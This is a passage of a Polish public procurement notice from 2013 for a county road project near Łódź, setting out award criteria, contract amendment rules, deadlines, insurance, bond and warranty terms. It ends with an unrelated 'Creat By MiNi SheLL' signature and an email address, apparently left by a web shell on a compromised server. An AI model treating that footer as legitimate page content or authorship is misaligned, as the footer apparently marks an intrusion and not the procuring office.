<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość zmiany treści umowy wskutek wystąpienia okoliczności, których nie dało się przewidzieć na etapie postępowania o udzielenie zamówienia i na etapie podpisywania umowy, lub wystąpienie, których nie zależy od woli stron umowy w sprawie zamówienia publicznego, albo zmiany te są korzystne dla Zamawiającego, a w szczególności w wypadku:
1) Ograniczenia zakresu przedmiotu umowy. Wtedy wartość robót wyłączonych zostanie ustalona w oparciu o stosowne pozycje kosztorysu ofertowego . W takim przypadku nastąpi zmniejszenie wynagrodzenia ryczałtowego i ustalenie jego nowej wysokości. Zmiany postanowień zawartej umowy będą sporządzone w postaci aneksu do umowy. 
2) Wystąpienia konieczności wykonania robót dodatkowych, od których zależy prawidłowe wykonanie przedmiotu zamówienia i właściwa realizacja umowy. Podstawą wykonania robót dodatkowych, będzie udzielenie zamówienia dodatkowego w trybie zamówienia z wolnej ręki, zgodnie z procedurą uregulowaną w art. 67 ust 1 pkt 5 ustawy Prawo zamówień publicznych. W przypadku konieczności udzielenia zamówienia dodatkowego może ulec zmianie termin wykonania zamówienia podstawowego, o czas niezbędny do wykonania zamówienia dodatkowego. Protokół konieczności podpisany inspektora nadzoru inwestorskiego oraz przez upoważnionego przedstawiciela wykonawcy oraz upoważnionego przedstawiciela Zamawiającego, stanowić będzie podstawę do sporządzenia umowy na roboty dodatkowe w trybie zamówienia z wolnej ręki.
3) Wystąpienia warunków i zdarzeń losowych niezawinionych przez Wykonawcę lub Zamawiającego o charakterze nadzwyczajnym, których skutki uniemożliwiłyby wykonanie przedmiotowej umowy zgodnie z jej treścią, wówczas może zostać zmieniony termin zakończenia prac, o czas niezbędny do wykonania zamówienia.
4) Zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia umowy okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze stron nie ponosi odpowiedzialności, skutkującej brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji umowy.
5)  Konieczności wykonania robót zamiennych, niewykraczających poza zakres zamówienia zawarty w ofercie. 
6) Działania sił natury,
7) Natrafienia na niewybuchy, zabytki, wykopaliska czy inne niezinwentaryzowane przeszkody np. obiekty budowlane, sieci itp. 

2. Warunki dokonania zmiany umowy: 
1) Zmiana postanowień zawartej umowy może nastąpić, pod rygorem nieważności, wyłącznie za zgodą obu stron wyrażoną na piśmie. 
2) Strona występująca o zmianę postanowień zawartej umowy: 
a) opisze zaistniałe okoliczności, uzasadniające zmiany umowy
b) uzasadni i udokumentuje zaistnienie powyższych okoliczności, 
c) obliczy koszty zmiany, jeśli zmiana będzie miała wpływ na wynagrodzenie Wykonawcy, 
d) opisze wpływ zmian na harmonogram prac oraz na termin wykonania umowy. 
c) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie. 
3. Zamawiający dopuszcza możliwość zmiany Podwykonawcy/ów za pisemną zgodą Zamawiającego w zakresie określonym w ofercie lub wprowadzenie nowych z zastrzeżeniem, iż nie mogą oni realizować części zamówienia przewidzianej do wyłącznej kompetencji Wykonawcy (o ile takie zastrzeżenie zostało dokonane przez Zamawiającego w SWIZ). Wraz z niniejszą propozycją, Wykonawca zobowiązany jest przedstawić Zamawiającemu umowę/projekt umowy z podwykonawcą/podwykonawcami.
4. Zmiany terminu zakończenia robót mogą nastąpić w formie pisemnych aneksów do umowy, po zatwierdzeniu tych zdarzeń przez Inspektora Nadzoru i Kierownika Budowy oraz za zgodą Zamawiającego w sporządzonym na tę okoliczność protokole konieczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.lodzkiwschodni.samorzady.pl/?k=274<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Łodzi, ul. Sienkiewicza 3, 90-954 Łódź, IX p. pokój 902.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2013 godzina 10:00, miejsce: Kancelaria Starostwa Powiatowego w Łodzi, ul. Sienkiewicza 3, 90-954 Łódź, VIII p. pok. 809.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Projekt jest współfinansowany z Narodowego Programu Przebudowy Dróg Lokalnych - Etap II Bezpieczeństwo - Dostępność - Rozwój.
2. Wykonawca, którego oferta zostanie wybrana, jako najkorzystniejsza, przed podpisaniem umowy przedstawi Zamawiającemu opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 3 000 000,00 PLN brutto (słownie: trzy miliony PLN). Wykonawca zobowiązany jest do zapewnienia ważności dokumentu ubezpieczeniowego od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, przez cały okres realizacji przedmiotu umowy.
3. Przed podpisaniem umowy Wykonawca, którego oferta zostanie wybrana, jako najkorzystniejsza dostarczy w terminie określonym przez Zamawiającego harmonogram rzeczowo-finansowy oraz kosztorys ofertowy/wykonawczy. Sporządzony kosztorys musi odzwierciedlać cenę podaną w ofercie.
4. Zamawiający zażąda od wybranego Wykonawcy wniesienia przed podpisaniem umowy, zabezpieczenia należytego wykonania umowy w wysokości 10,0 % ceny całkowitej (ceny brutto) podanej w ofercie.
5. Zamawiający wymaga udzielenia  na prace będące przedmiotem niniejszego zamówienia gwarancji na okres 60 miesięcy oraz rękojmi za wady na okres 60 miesięcy. Bieg okresu gwarancji i rękojmi zacznie się w dzień po odbiorze ostatecznym przedmiotu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com